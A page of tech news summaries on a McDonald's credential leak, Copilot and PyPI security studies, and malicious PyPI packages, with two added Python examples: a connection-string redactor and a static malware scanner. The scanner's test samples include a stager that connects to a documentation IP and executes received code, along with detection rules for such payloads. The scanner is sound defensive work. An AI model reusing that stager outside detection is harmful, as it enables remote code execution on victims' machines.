Security

McDonald's Leaks Password For Monopoly VIP Database To Winners (bleepingcomputer.com) 33

A bug in the McDonald's Monopoly VIP game in the United Kingdom caused the login names and passwords for the game's database to be sent to all winners. BleepingComputer reports: After skipping a year due to COVID-19, McDonald's UK launched their popular Monopoly VIP game on August 25th, where customers can enter codes found on purchased food items for a chance to win a prize. These prizes include 100,000 pounds in cash, an Ibiza villa or UK getaway holiday, Lay-Z Spa hot tubs, and more. Unfortunately, the game hit a snag over the weekend after a bug caused the usernames and passwords for both the production and staging database servers to be included in prize redemption emails sent to prize winners.

An unredacted screenshot of the email sent to prize winners was shared with BleepingComputer by Troy Hunt that shows an exception error, including sensitive information for the web application. This information included hostnames for Azure SQL databases and the databases' login names and passwords, as displayed in the redacted email below sent to a Monopoly VIP winner. The prize winner who shared the email with Troy Hunt said that the production server was firewalled off but that they could access the staging server using the included credentials. As these databases may have contained winning prize codes, it could have allowed an unscrupulous person to download unused game codes to claim the prizes. Luckily for McDonald's, the person responsibly disclosed the issue to McDonald's, and while they did not receive a response, they later found that the staging server's password was soon changed.
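The failure mode in this story is an unhandled exception whose text, connection string included, was rendered straight into a customer-facing email. The following is an added example, not code from BleepingComputer or McDonald's, showing that leaky pattern beside a hardened version that logs a redacted copy server-side and sends the winner only a reference id; the hostname, database and credentials in the sample exception are constructed placeholders.

```python
import logging
import re
import uuid

log = logging.getLogger("prize-mailer")

# Keys in an ADO.NET / Azure SQL style connection string whose values must never
# leave the server. Matching is case-insensitive; a value runs up to the next ';'.
_SENSITIVE_KV = re.compile(
    r"(?i)\b(password|pwd|user id|uid|server|data source)\s*=\s*[^;]*"
)


def redact_connection_details(text: str) -> str:
    """Scrub credential-bearing key=value pairs from free-form error text,
    keeping the key name so the log still says what was redacted."""
    return _SENSITIVE_KV.sub(lambda m: f"{m.group(1)}=[REDACTED]", text)


def render_email_unsafe(winner: str, prize: str, exc: Exception) -> str:
    """The failure mode: the raw exception text is pasted into the email body,
    so whatever the database driver put in its message reaches the customer."""
    return (f"Dear {winner}, you have won {prize}.\n"
            f"We hit a problem redeeming your prize:\n{exc}\n")


def render_email_safe(winner: str, prize: str, exc: Exception) -> tuple:
    """Hardened version: keep the detail server-side (redacted, under a random
    reference id) and give the winner only that id. Returns (body, reference_id)."""
    ref = uuid.uuid4().hex[:12]
    log.error("redemption failure ref=%s detail=%s",
              ref, redact_connection_details(str(exc)))
    body = (f"Dear {winner}, you have won {prize}.\n"
            f"We hit a problem redeeming your prize. Please quote reference "
            f"{ref} when contacting support.\n")
    return body, ref


# Constructed sample exception of the shape an Azure SQL client raises on a login
# failure. Host, database and credentials are placeholders, not incident values.
SAMPLE_EXC = RuntimeError(
    "Login failed. Connection string: "
    "Server=tcp:example-stage.database.windows.net,1433;Database=prizes;"
    "User ID=prize_app;Password=NotARealPassw0rd!;Encrypt=True;"
)

if __name__ == "__main__":
    logging.basicConfig(level=logging.ERROR)
    print(render_email_unsafe("A. Winner", "a spa day", SAMPLE_EXC))
    print(render_email_safe("A. Winner", "a spa day", SAMPLE_EXC)[0])
```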

Programming

Developer Returns To Game After Four Decades, Discovers and Fixes Typo So It Works (tomsguide.com) 98

joshuark writes: Harry McCracken is not the name of a Cold War superspy, but a man who is now the tech editor of Fast Company and, in his younger days, a developer of games for Radio Shack's TRS-80 microcomputer. McCracken, who is also a regular Slashdot reader, recently went back to have a look at his first game, Arctic Adventure, which he wrote when he was 16 around 1980-81 -- a text adventure inspired by the work of Scott Adams in particular, a pioneering designer of the Adventure series of games for the TRS-80.

As was common in the 80s, Arctic Adventure was distributed in book form. This was The Captain 80 Book of BASIC Adventures: pages of type-it-yourself BASIC code, each entry its own adventure game. [...] "Decades later, I didn't spend much time thinking about Arctic Adventure, but I never forgot the fact that I hadn't received a copy of the Captain 80 book. Thanks to the internet, I eventually acquired one. But typing in five-and-a-half pages of old BASIC code seemed onerous, even if it was code I'd written."

McCracken eventually got around to it this July. "After five or six tedious typing sessions on my iPad, I had Arctic Adventure restored to digital form. That was when I made an alarming discovery: As printed in the Captain 80 book, the game wasn't just unwinnable, but unplayable. It turned out that it had a 1981 typo that consisted of a single missing '0' in a character string. It was so fundamental a glitch that it rendered the game's command of the English language inoperable. You couldn't GET SHOVEL let alone complete the adventure."

The Courts

GitHub Files Court Brief Criticizing 'Vague Infringement Allegations' (github.blog) 24

"One project going dark — due to a DMCA takedown or otherwise — can impact thousands of developers," GitHub warns in a blog post this week: We saw that firsthand with both leftpad and mimemagic. That's why GitHub's designed its DMCA process to follow the law in requiring takedown requests to identify specific content. We want developers on our platform and elsewhere to have a clear opportunity to remove infringing code yet keep non-infringing code up for others to use, modify, and learn from.

Ensuring that software copyright allegations are specific and actionable benefits the entire developer ecosystem. That's why GitHub submitted a "friend of the court" brief in the SAS Institute, Inc. v. World Programming Ltd. case before a Federal Court of Appeals.

This case is the most recent in a ten-year litigation spanning both the UK and the US. SAS Institute has brought copyright and non-copyright claims against World Programming's software that runs code written in the SAS language, and the copyright claims drew comparison to the recent Google v. Oracle Supreme Court case. But this case is different from Google v. Oracle because here the alleged copyright infringement is based on a claim of "nonliteral" infringement. That means there is no allegation that specific lines of code were literally copied, but only that other aspects, like the code's overall structure and organization, were used. In nonliteral infringement claims, the questions arise: what aspects of the "nonliteral" features were taken and are they actually protected by copyright...?

GitHub believes that for claims involving nonliteral copying of software, it is critical that a copyright owner provide — as early as possible — examples that would allow a developer, a court, or a software collaboration platform like GitHub to identify what was claimed to be copied. Our brief helps educate the court why specificity is especially important for developers.... We urged the court to think about efficiency in dispute resolution to avoid FUD (fear, uncertainty, and doubt). The sooner infringement allegations can be made specific and clear, the sooner infringing code can be changed and non-infringing code can stay up. That should be the result for both federal lawsuits, as well as DMCA infringement notices.

Microsoft

Microsoft Previews Free Visual Studio Code for the Web (theregister.com) 33

Microsoft is previewing Visual Studio Code for the Web, a code editor that runs entirely in the browser. The Register: The post introducing the new service was put up yesterday but is returning "page not found" at the time of writing, so possibly was published prematurely. But it is expected to return soon, since the technology looks the same as that already introduced by Microsoft-owned GitHub as the web-based editor.

The difference is that GitHub's version only works in a GitHub repository, where it is opened by pressing the dot key. By contrast, Microsoft stated: "Everyone can use VS Code for the Web for free at https://vscode.dev to quickly open and browse source code hosted on GitHub and on your local machine (and soon on Azure Repos), and make and commit lightweight changes."

Google

Google Play App Store Revenue Hit $11.2 Billion in 2019, Lawsuit Says (reuters.com) 9

Alphabet's Google generated $11.2 billion in revenue from its mobile app store in 2019, according to a court filing unsealed on Saturday, offering a clear view into the service's financial results for the first time. From a report: Attorneys general for Utah and 36 other U.S. states or districts suing Google over alleged antitrust violations with the app store also said in the newly unredacted filing that the business in 2019 had $8.5 billion in gross profit and $7 billion in operating income, for an operating margin of over 62%. The figures include sales of apps, in-app purchase and app store ads. Google told Reuters the data "are being used to mischaracterize our business in a meritless lawsuit."

The company and its accusers said in a separate filing on Saturday a trial in late 2022 is possible over whether Google abuses its alleged monopoly in app sales for Android devices. In its quarterly financial disclosures, Google groups Play app revenue with that of other services and accounts for the store's ad revenue as part of another broader category. Attorneys general, as well as mobile app developer Epic Games and others separately suing Google, have contended that it generates huge profits through the Play Store by taking 30% of the fee for every digital good sold inside an app. The plaintiffs say Google's cut is arbitrarily high, siphoning app developers' profits.

AI

40% of GitHub's Copilot's Suggestions Had Security Vulnerabilities, Study Finds (visualstudiomagazine.com) 24

"Academic researchers discover that nearly 40% of the code suggestions by GitHub's Copilot tool are erroneous, from a security point of view..." writes TechRadar: To help quantify the value-add of the system, the academic researchers created 89 different scenarios for Copilot to suggest code for, which produced over 1600 programs. Reviewing them, the researchers discovered that almost 40% were vulnerable in one way or another...

Since Copilot draws on publicly available code in GitHub repositories, the researchers theorize that the generated vulnerable code could perhaps just be the result of the system mimicking the behavior of buggy code in the repositories. Furthermore, the researchers note that in addition to perhaps inheriting buggy training data, Copilot also fails to consider the age of the training data. "What is 'best practice' at the time of writing may slowly become 'bad practice' as the cybersecurity landscape evolves."

Visual Studio magazine highlights another concern. 39.33 percent of the top options were vulnerable, the paper noted, adding that "The security of the top options are particularly important — novice users may have more confidence to accept the 'best' suggestion...." "There is no question that next-generation 'auto-complete' tools like GitHub Copilot will increase the productivity of software developers," the authors (Hammond Pearce, Baleegh Ahmad, Benjamin Tan, Brendan Dolan-Gavitt and Ramesh Karri) say in conclusion.

"However, while Copilot can rapidly generate prodigious amounts of code, our conclusions reveal that developers should remain vigilant ('awake') when using Copilot as a co-pilot. Ideally, Copilot should be paired with appropriate security-aware tooling during both training and generation to minimize the risk of introducing security vulnerabilities."

Businesses

Apple Will Now let App Store Developers Talk To Their Customers About Buying Direct (techcrunch.com) 19

Apple announced today it has reached a proposed settlement in a lawsuit filed against it by developers in the United States. The agreement, which is still pending court approval, includes a few changes, the biggest one being that developers will be able to share information on how to pay for purchases outside of their iOS app or the App Store -- which means they can tell customers about payment options that aren't subject to Apple commissions. The settlement also includes more pricing tiers and a new transparency report about the app review process. From a report: The class-action lawsuit was filed against Apple in 2019 by app developers Donald Cameron and Illinois Pure Sweat Basketball, who said the company engaged in anticompetitive practices by only allowing the downloading of iPhone apps through its App Store. In today's announcement, Apple said it is "clarifying that developers can use communications, such as emails, to share information about payment methods outside of their iOS app. As always, developers will not pay Apple a commission on any purchases taking place outside of their app or the App Stores."

Java

Alphabet's Drones Delivered 10,000 Cups of Coffee, 1,200 Roast Chickens In the Last Year (cnbc.com) 30

Alphabet's drone company Wing delivered 10,000 cups of coffee, 1,700 snack packs and 1,200 roast chickens to customers in Logan, Australia, over the last year, the company said Wednesday in a blog post outlining its progress. CNBC reports: Wing was launched in 2019 in Australia, following a series of drone tests that began in 2014. The service, which was initially part of Alphabet's experimental research division, allows users to order items such as food through a mobile app and is fast approaching 100,000 deliveries since its launch. Wing hopes to one day deliver products to people all over the world without having to rely on drivers or delivery trucks like other companies.

The company works with more than 30 partners globally, including local coffee shops and national brands such as Walgreens, according to a February blog post. Local businesses can also reach out directly to the company to get involved. In 2020, Wing partnered with a Virginia school district to deliver library books during the pandemic.

Programming

Turns Out The Hardest Part of Making a Game is Everything (ign.com) 88

Game devs of all sizes and scopes respond to the question: "What is a thing in video games that seems simple but is actually extremely hard to make?" From a report: Earlier this year, game developers across the industry weighed in on Twitter on a seemingly innocuous question: What's the problem with doors in video games? It turns out, a lot. A seemingly boring feature such as usable doors can be absolute hell for developers to put in their games for numerous reasons. Everything from physics to functionality, from AI to sound, comes into play while making a single door in a single video game work. And not just work, but work in such a way where the player never has to think about it. Building a working, forgettable door is an incredible game development undertaking. But it will probably not surprise you to learn that doors are far from the only seemingly simple feature that prove to be unexpectedly challenging in the development process.

A few months ago, I asked developers across the industry the question, "What is a thing in video games that seems simple but is actually extremely hard for game developers to make?" I received nearly 100 responses representing a wide breadth of industry experience, ranging from solo developers to those who had tackled issues within teams of hundreds. The pool of responses similarly included a number of varied problems, but also a number of similar issues popping up among many projects. Those I spoke to described challenges in making games look and sound good, storytelling, movement and interaction with objects, menus, save systems, multiplayer, and all sorts of intricacies of design that are so rarely discussed outside of studios themselves. Many noted that they've received angry player feedback about the topics they mentioned, with their audiences asking, "Why don't you just do X?" The answer is, almost always: because it's really, really hard.

So if you've ever wondered why the maker of your favorite game didn't simply fix one of the myriad issues developers mentioned below, here's why those seemingly simple problems are hardly simple at all. As the original topic of game development headaches focused on doors, it made sense that many of the developers I spoke to had issues with other methods used to connect a person from one place to another. For instance, elevators. Multiple developers told me about the frustrations of elevators, whether they're taking players up a single floor in a building or serving as pseudo-loading screens between two major game areas. [...]

Microsoft

A Decade Later, .NET Developers Still Fear Being 'Silverlighted' By Microsoft (visualstudiomagazine.com) 125

the_insult_dog writes: Some 10 years after the final Microsoft Silverlight release, some developers still fear being 'Silverlighted,' or seeing a development product in which they have invested heavily be abandoned by Microsoft.

Microsoft will tell you that official support for Silverlight will end in less than two months, on Oct. 12, 2021. Anyone in the industry will tell you it effectively died around 2011 when the last version, Silverlight 5, was made available for download. Speculation about its demise arose around the same time.

Security

Secret Terrorist Watchlist With 2 Million Records Exposed Online (bleepingcomputer.com) 87

A secret terrorist watchlist with 1.9 million records, including classified "no-fly" records, was exposed on the internet. The list was left accessible on an Elasticsearch cluster that had no password on it. BleepingComputer reports: In July this year, Security Discovery researcher Bob Diachenko came across a plethora of JSON records in an exposed Elasticsearch cluster that piqued his interest. The 1.9 million-strong recordset contained sensitive information on people, including their names, country citizenship, gender, date of birth, passport details, and no-fly status. The exposed server was indexed by search engines Censys and ZoomEye, indicating Diachenko may not have been the only person to come across the list.

The researcher discovered the exposed database on July 19th, interestingly, on a server with a Bahrain IP address, not a US one. However, the same day, he rushed to report the data leak to the U.S. Department of Homeland Security (DHS). "I discovered the exposed data on the same day and reported it to the DHS." "The exposed server was taken down about three weeks later, on August 9, 2021." "It's not clear why it took so long, and I don't know for sure whether any unauthorized parties accessed it," writes Diachenko in his report. The researcher considers this data leak to be serious, considering watchlists can list people who are suspected of an illicit activity but not necessarily charged with any crime. "In the wrong hands, this list could be used to oppress, harass, or persecute people on the list and their families." "It could cause any number of personal and professional problems for innocent people whose names are included in the list," says the researcher.

Java

Report: Java 'Surges' Back Up in Programming Language Popularity (zdnet.com) 60

"The programming language Java's popularity has been slowly declining in some programming language index rankings, but it's popped back into the second spot in RedMonk's latest chart," reports ZDNet: JavaScript still rules in RedMonk's Q3 2021 language popularity rankings, which have been updated twice a year since 2010.

Python overtook Java for the second spot in RedMonk's Q2 2020 ranking, and Java has remained there in Python's shadow ever since, but now it has jumped one spot to second — a place it once again shares with Python. As RedMonk analyst Stephen O'Grady notes, Java's consistent third placing over the past year was "prompting questions from observers as to whether it was fated to a gradual drift down these rankings".

Tiobe's CEO Paul Jensen last September said Java was in "real trouble" because of a notable decline in its share of queries for programming languages on major search engines. But now, according to RedMonk, Java has 'surged' back. "This would be less of a surprise but for many of the language's competitors — and, it should be said, the odd industry analyst or two — writing regularly recurring epitaphs for the stalwart of enterprise infrastructure," said O'Grady.

The article also reports that Google's Dart programming language "made its debut in RedMonk's top 20 this month and displaced Perl."

Programming

OpenAI's Codex Turns Written Language Into Computer Code 69

A new AI system can read written instructions in conversational language and transform them into working computer code. From a report: The model is the latest example of progress in natural language processing (NLP), the ability of AIs to read and write text. But it also points towards a future where coders will be able to offload some of their work to AIs, and where ordinary people may be able to code without actually learning how to code.

Today OpenAI is releasing an improved version of its Codex AI model and releasing it privately to developers through its API. Codex is a descendant of OpenAI's massive text-generating model GPT-3, which was released last summer. But while GPT-3 was trained on a huge quantity of language data taken from the internet -- enabling it to read and then complete text prompts submitted by a human user -- Codex was trained on both language and billions of lines of publicly available computer code.

Microsoft

Microsoft is Recruiting US Teens To Be Influencers on Social Media for Its Educational Coding Platform (twitter.com) 33

Long-time Slashdot reader theodp writes: Just ahead of the new school year, Microsoft and its nonprofit partner Code.org took to Twitter to recruit teens for Microsoft's inaugural MakeCode Insiders Program. Microsoft MakeCode is a code platform that allows kids to write programs for a wide variety of applications even if they have little or no previous coding experience; there's also a College Board-endorsed MakeCode AP CS curriculum, which can earn high school students college credit...

MakeCode Insiders, Microsoft adds, will be recognized for completing key milestones with badges, including MakeCode Influencer ("This badge is earned when a MakeCode Wizard is chosen to represent our product to teens on social media."). MakeCode Influencers, Microsoft explains, "are teens who have graduated from the Insiders program and are selected to represent MakeCode on social media in various forms...

Insider applications are due today, kids!

This is Microsoft's first time running the "Insider" program, and the guidebook promises the larger program's Insiders "will focus on MakeCode Arcade, a coding editor for retro-style video games, offering feedback and ideas that will inform product decision."

Programming

Are Python Libraries Riddled With Security Holes? (techradar.com) 68

"Almost half of the packages in the official Python Package Index (PyPI) repository have at least one security issue," reports TechRadar, citing a new analysis by Finnish researchers, which even found five packages with more than a thousand issues each... The researchers used static analysis to uncover the security issues in the open source packages, which they reason end up tainting software that uses them. In total the research scanned through 197,000 packages and found more than 749,000 security issues in all... Explaining their methodology, the researchers note that despite the inherent limitations of static analysis, they still found at least one security issue in about 46% of the packages in the repository. The paper reveals that of the issues identified, the maximum (442,373) are of low severity, while 227,426 are moderate severity issues. However, 11% of the flagged PyPI packages have 80,065 high severity issues.

The Register supplies some context: Other surveys of this sort have come to similar conclusions about software package ecosystems. Last September, a group of IEEE researchers analyzed 6,673 actively used Node.js apps and found about 68 per cent depended on at least one vulnerable package... The situation is similar with package registries like Maven (for Java), NuGet (for .NET), RubyGems (for Ruby), CPAN (for Perl), and CRAN (for R). In a phone interview, Ee W. Durbin III, director of infrastructure at the Python Software Foundation, told The Register, "Things like this tend not to be very surprising. One of the most overlooked or misunderstood parts of PyPI as a service is that it's intended to be freely accessible, freely available, and freely usable. Because of that we don't make any guarantees about the things that are available there..."

Durbin welcomed the work of the Finnish researchers because it makes people more aware of issues that are common among open package management systems and because it benefits the overall health of the Python community. "It's not something we ignore but it's also not something we historically have had the resources to take on," said Durbin. That may be less of an issue going forward. According to Durbin, there's been significantly more interest over the past year in supply chain security and what companies can do to improve the situation. For the Python community, that's translated into an effort to create a package vulnerability reporting API and the Python Advisory Database, a community-run repository of PyPI security advisories that's linked to the Google-spearheaded Open Vulnerability Database.

Programming

Free Software Foundation Will Fund Papers on Issues Around Microsoft's 'GitHub Copilot' (fsf.org) 111

GitHub's new "Copilot" tool (created by Microsoft and OpenAI) shares the autocompletion suggestions of an AI trained on code repositories. But can that violate the original coder's license? Now the Free Software Foundation (FSF) is calling for a closer look at these and many other issues...

"We already know that Copilot as it stands is unacceptable and unjust, from our perspective," they wrote in a blog post this week, arguing that Copilot "requires running software that is not free/libre (Visual Studio, or parts of Visual Studio Code), and Copilot is Service as a Software Substitute. These are settled questions as far as we are concerned."

"However, Copilot raises many other questions which require deeper examination..." The Free Software Foundation has received numerous inquiries about our position on these questions. We can see that Copilot's use of freely licensed software has many implications for an incredibly large portion of the free software community. Developers want to know whether training a neural network on their software can really be considered fair use. Others who may be interested in using Copilot wonder if the code snippets and other elements copied from GitHub-hosted repositories could result in copyright infringement. And even if everything might be legally copacetic, activists wonder if there isn't something fundamentally unfair about a proprietary software company building a service off their work.

With all these questions, many of them with legal implications that at first glance may have not been previously tested in a court of law, there aren't many simple answers. To get the answers the community needs, and to identify the best opportunities for defending user freedom in this space, the FSF is announcing a funded call for white papers to address Copilot, copyright, machine learning, and free software.

We will read the submitted white papers, and we will publish ones that we think help elucidate the problem. We will provide a monetary reward of $500 for the papers we publish.

They add that the following questions are of particular interest:
  • Is Copilot's training on public repositories infringing copyright? Is it fair use?
  • How likely is the output of Copilot to generate actionable claims of violations on GPL-licensed works?
  • How can developers ensure that any code to which they hold the copyright is protected against violations generated by Copilot?
  • Is there a way for developers using Copilot to comply with free software licenses like the GPL?
  • If Copilot learns from AGPL-covered code, is Copilot infringing the AGPL?
  • If Copilot generates code which does give rise to a violation of a free software licensed work, how can this violation be discovered by the copyright holder on the underlying work?
  • Is a trained artificial intelligence (AI) / machine learning (ML) model resulting from machine learning a compiled version of the training data, or is it something else, like source code that users can modify by doing further training?
  • Is the Copilot trained AI/ML model copyrighted? If so, who holds that copyright?
  • Should ethical advocacy organizations like the FSF argue for change in copyright law relevant to these questions?

Education

Texas Instruments' New Calculator Will Run Programs Written in Python (dallasnews.com) 126

"Dallas-based Texas Instruments' latest generation of calculators is getting a modern-day update with the addition of programming language Python," reports the Dallas Morning News: The goal is to expand students' ability to explore science, technology, engineering and math through the device that's all-but-required in the nation's high schools and colleges...

Though most of the company's $14 billion in annual revenue comes from semiconductors, its graphing calculator remains its most recognized consumer product. This latest TI-84 model, priced between $120 to $160 depending on the retailer, was made to accommodate the increasing importance of programming in the modern world.

Judging by photos in their press release, an "alpha" key maps the calculator's keys to the letters of the alphabet (indicated with yellow letters above each key). One page on its web site also mentions "Menu selections" that "help students with discovery and syntax." (And the site confirms the calculator will "display expressions, symbols and fractions just as you write them.")

There's even a file manager that "gives quick access to Python programs you have saved on your calculator. From here, you can create, edit, run and manage your files." And one page also mentions something called TI Connect CE software application, which "connects your computer and graphing calculator so they can talk to each other. Use it to transfer data, update your operating system, download calculator software applications or take screenshots of your graphing calculator."

I'm sure Slashdot's readers have some fond memories of their first calculator. But these new models have a full-color screen and a rechargeable battery that can last up to a month on a single charge. And Texas Instruments seems to think they could even replace computers in the classroom. "By adding Python to the calculators many students are already familiar with and use in class, we are making programming more accessible and approachable for all students," their press release argues, "eliminating the need for teachers to reserve separate computer labs to teach these important skills."

Programming

After YouTube-dl Incident, GitHub's DMCA Process Now Includes Free Legal Help (venturebeat.com) 30

"GitHub has announced a partnership with the Stanford Law School to support developers facing takedown requests related to the Digital Millennium Copyright Act (DMCA)," reports VentureBeat: While the DMCA may be better known as a law for protecting copyrighted works such as movies and music, it also has provisions (17 U.S.C. 1201) that criminalize attempts to circumvent copyright-protection controls — this includes any software that might help anyone infringe DMCA regulations. However, as with the countless spurious takedown notices delivered to online content creators, open source coders too have often found themselves in the DMCA firing line with little option but to comply with the request even if they have done nothing wrong. The problem, ultimately, is that freelance coders or small developer teams often don't have the resources to fight DMCA requests, which puts the balance of power in the hands of deep-pocketed corporations that may wish to use DMCA to stifle innovation or competition. Thus, GitHub's new Developer Rights Fellowship — in conjunction with Stanford Law School's Juelsgaard Intellectual Property and Innovation Clinic — seeks to help developers put in such a position by offering them free legal support.

The initiative follows some eight months after GitHub announced it was overhauling its Section 1201 claim review process in the wake of a takedown request made by the Recording Industry Association of America (RIAA), which had been widely criticized as an abuse of DMCA... [M]oving forward, whenever GitHub notifies a developer of a "valid takedown claim," it will present them with an option to request free independent legal counsel.

The fellowship will also be charged with "researching, educating, and advocating on DMCA and other legal issues important for software innovation," GitHub's head of developer policy Mike Linksvayer said in a blog post, along with other related programs.

Explaining their rationale, GitHub's blog post argues that currently "When developers looking to learn, tinker, or make beneficial tools face a takedown claim under Section 1201, it is often simpler and safer to just fold, removing code from public view and out of the common good.

"At GitHub, we want to fix this."

Security

Software Downloaded 30,000 Times From PyPI Ransacked Developers' Machines (arstechnica.com) 26

Open source packages downloaded an estimated 30,000 times from the PyPI open source repository contained malicious code that surreptitiously stole credit card data and login credentials and injected malicious code on infected machines, researchers said on Thursday. Ars Technica reports: In a post, researchers Andrey Polkovnichenko, Omer Kaspi, and Shachar Menashe of devops software vendor JFrog said they recently found eight packages in PyPI that carried out a range of malicious activity. Based on searches on https://pepy.tech, a site that provides download stats for Python packages, the researchers estimate the malicious packages were downloaded about 30,000 times. [...] Different packages from Thursday's haul carried out different kinds of nefarious activities. Six of them had three payloads, one for harvesting authentication cookies for Discord accounts, a second for extracting any passwords or payment card data stored by browsers, and the third for gathering information about the infected PC, such as IP addresses, computer name, and user name. The remaining two packages had malware that tries to connect to an attacker-designated IP address on TCP port 9009, and to then execute whatever Python code is available from the socket. It's not known what the IP address was or if there was malware hosted on it.

Like most novice Python malware, the packages used only simple obfuscation, such as Base64 encoding. Karas told me that the first six packages had the ability to infect the developer computer but couldn't taint the code developers wrote with malware. "For both the pytagora and pytagora2 packages, which allow code execution on the machine they were installed on, this would be possible," he said in a direct message. "After infecting the development machine, they would allow code execution and then a payload could be downloaded by the attacker that would modify the software projects under development. However, we don't have evidence that this was actually done."
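A small static check, added here and not part of JFrog's or the researchers' tooling, for the two behaviours the report describes: exec() of a Base64-decoded blob, and a connect to a hardcoded address followed by executing whatever the socket returns; it is the same kind of rule the static-analysis survey of PyPI discussed earlier on this page relies on. It only parses package source with Python's ast module; the sample inputs are constructed, use an RFC 5737 documentation address, and are never executed.

```python
import ast

# Call targets that turn an encoded blob back into code or bytes.
DECODERS = {"base64.b64decode", "b64decode", "base64.b85decode",
            "base64.b32decode", "bytes.fromhex", "zlib.decompress"}
# Call targets that run a string as Python.
EXECUTORS = {"exec", "eval", "compile"}


def _dotted(node: ast.AST) -> str:
    """Dotted name of a call target: 'base64.b64decode', 's.recv', 'exec'.
    A call chained off another call (socket.socket().connect) loses its prefix."""
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    if isinstance(node, ast.Name):
        return node.id
    return ""


def _calls_under(node: ast.AST):
    """Yield (dotted_name, Call) for every call nested anywhere inside node."""
    for n in ast.walk(node):
        if isinstance(n, ast.Call):
            yield _dotted(n.func), n


def scan_source(source: str, filename: str = "<pkg>") -> list:
    """Return sorted (line, rule, detail) findings for one Python source file."""
    findings = []
    for name, call in _calls_under(ast.parse(source, filename)):
        if name in EXECUTORS:
            # Every call made while building the executor's arguments.
            inner = {n for arg in call.args for n, _ in _calls_under(arg)}
            if inner & DECODERS:
                findings.append((call.lineno, "exec-of-decoded-payload", name))
            if any(n.split(".")[-1] == "recv" for n in inner):
                findings.append((call.lineno, "exec-of-network-data", name))
        elif name.split(".")[-1] == "connect" and call.args:
            # socket.connect((host, port)) with both halves as literals.
            target = call.args[0]
            if (isinstance(target, ast.Tuple) and len(target.elts) == 2
                    and all(isinstance(e, ast.Constant) for e in target.elts)):
                host, port = (e.value for e in target.elts)
                findings.append((call.lineno, "hardcoded-remote-endpoint",
                                 f"{host}:{port}"))
    # compile() nested inside exec() would otherwise report twice on one line.
    return sorted(set(findings))


# Constructed samples modelled on the behaviours in the report above. They are
# parsed by scan_source, never run; 203.0.113.10 is a documentation address.
SAMPLE_STAGER = '''
import socket
s = socket.socket()
s.connect(("203.0.113.10", 9009))
exec(s.recv(65536).decode())
'''

SAMPLE_OBFUSCATED = '''
import base64
exec(base64.b64decode("cHJpbnQoImhlbGxvIik="))  # decodes to print("hello")
'''

# Base64 used for data, not code: decoded bytes go to json.loads, not exec().
SAMPLE_CLEAN = '''
import base64, json
cfg = json.loads(base64.b64decode(open("cfg.b64").read()))
print(cfg["name"])
'''

if __name__ == "__main__":
    for label, src in [("stager", SAMPLE_STAGER),
                       ("obfuscated", SAMPLE_OBFUSCATED),
                       ("clean", SAMPLE_CLEAN)]:
        print(label, scan_source(src))
```

Findings are indicators, not verdicts: the clean sample shows why a decoder call alone is not enough, and a real scan would walk every .py file of the package plus setup.py.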
